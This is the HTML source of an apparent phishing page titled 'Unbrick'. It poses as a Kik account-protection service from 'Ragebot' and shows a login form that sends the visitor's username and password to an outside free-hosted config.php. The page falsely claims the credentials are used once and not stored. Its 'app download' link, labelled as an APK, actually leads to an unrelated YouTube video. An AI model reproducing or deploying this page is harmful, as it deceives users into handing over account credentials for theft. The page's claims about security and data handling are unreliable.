<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<style>
body{
width: 100%;
height: 100%;
margin: 0;
padding: 0;
font-family: sans-serif;
background-image: url(bg2.jpg);
background-size: cover;
min-width: 100px
}
.title {
margin:2px solid black;
text-align: center;
font-size: 3rem;
color: FloralWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px
}
.intro{
left:50%;
margin-bottom: 24px;
text-align: center;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px
}
.box{
position: relative;
top: 25%;
left: 50%;
transform: translate(-50%,-50%);
width: 400px;
height: 350px;
padding: 40px;
background: rgba(0, 0, 0, 0.6);
box-sizing: border-box;
box-shadow: 0 15px 25px rgba(0, 0, 0, 0.5);
border-radius: 10px;
min-width: 100px
}
.box h2{
margin: 0 0 30px;
padding: 0px;
text-align: center;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px;
}
.box .input-box{
position: relative;
font-family: 'Brush Script MT', cursive;
min-width: 100px;
}
.box .input-box input{
width: 100%;
padding: 10px 0px;
font-size: 16px;
letter-spacing: 1px;
margin-bottom: 30px;
border: none;
outline: none;
background: transparent;
border-bottom: 1px solid #fff;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px;
}
.box .input-box label{
top: 0;
left: 0;
letter-spacing: 1px;
padding: 10px 0px;
font-size: 16px;
transition: .5s;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px;
}
.box .input-box input:focus ~ label,
.box .input-box input:valid ~ label{
top: -18px;
left: 0px;
font-size: 12px;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px
}
.box input[type="submit"]{
background: transparent;
border: none;
outline: none;
background: transparent;
padding: 10px 20px;
border-radius: 5px;
cursor:pointer;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px
}
.box input[type="submit"]:hover{
background-color: transparent;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px
}
.random{
position: relative;
top: 30%;
height: 200px;
margin-bottom: 100px;
color:GhostWhite;
font-family: 'Brush Script MT', cursive;
min-width: 100px;
}
</style>
<title>Unbrick</title>
<link type="image/x-icon" rel="shortcut icon" href="kik.png">
</head>
<body>
<div>
<h1 class="title">Unbrick</h1>
<p class="intro">
This is an upgraded unbrick service by the people from Ragebot.
<br>
It automatically block bricks in real time!
<br>This is achieved by looping unbrick sessions without logging you off, keeping your <br>account protected from any and every attack directed at it.
<br>
Note: Your credentials are only used once, we do not store them. You will be logged out once; <br>wait for a duration of 5 minutes before logging in again.
</p>
</div>
<div class="box">
<h2>Login</h2>
<form action="https://unbrikmykik.000webhostapp.com/config.php">
<div class="input-box">
<input type="text" name="username" autocomplete="off" required autocapitalize="none" oninput="sanitizeUsername(); verify()" onchange="verify()">
<label for="">Username</label>
</div>
<div class="input-box">
<input type="password" name="password" autocomplete="off" minlength="5" required oninput="verify()" onchange="verify()">
<label for="">Password</label>
</div>
<h2><input type="submit" id="go" value="Unbrick me"></h2>
</form>
<div class="random">
<p style="text-align:center; font: Brush Script MT; font-style: cursive; color: GhostWhite; margin-top: -100px;"><br>
Alternatively, we made an Android app for unbricking accounts, it can be downloaded at <a href="https://www.youtube.com/watch?v=dQw4w9WgXcQ">https://ragebot.net/public/unbrik.apk</a>.
By using this, your credentials won't be shared with us.
</p>
<p style="text-align:center; font: Brush Script MT; font-style: cursive; color: GhostWhite">
(The app is currently in beta testing and under maintainance due to which it cannot be downloaded.)
</p>
<p style="text-align: center;font: Brush Script MT; font-style: cursive; color: GhostWhite">This is an early release, if you experience any bugs then please let us know at
<br>
<a href="https://kik.me/sacrificer">@sacrificer</a> or <a href="https://kik.me/jdbzidbs">@jdbzidbs</a> </p>
<br>
<p style="text-align: center;font: Brush Script MT; font-style: cursive; color: GhostWhite; margin-bottom: 50px;">You can check logs <a href="redirect.php">here</a></p>
<br>
</div>
</body>
</html>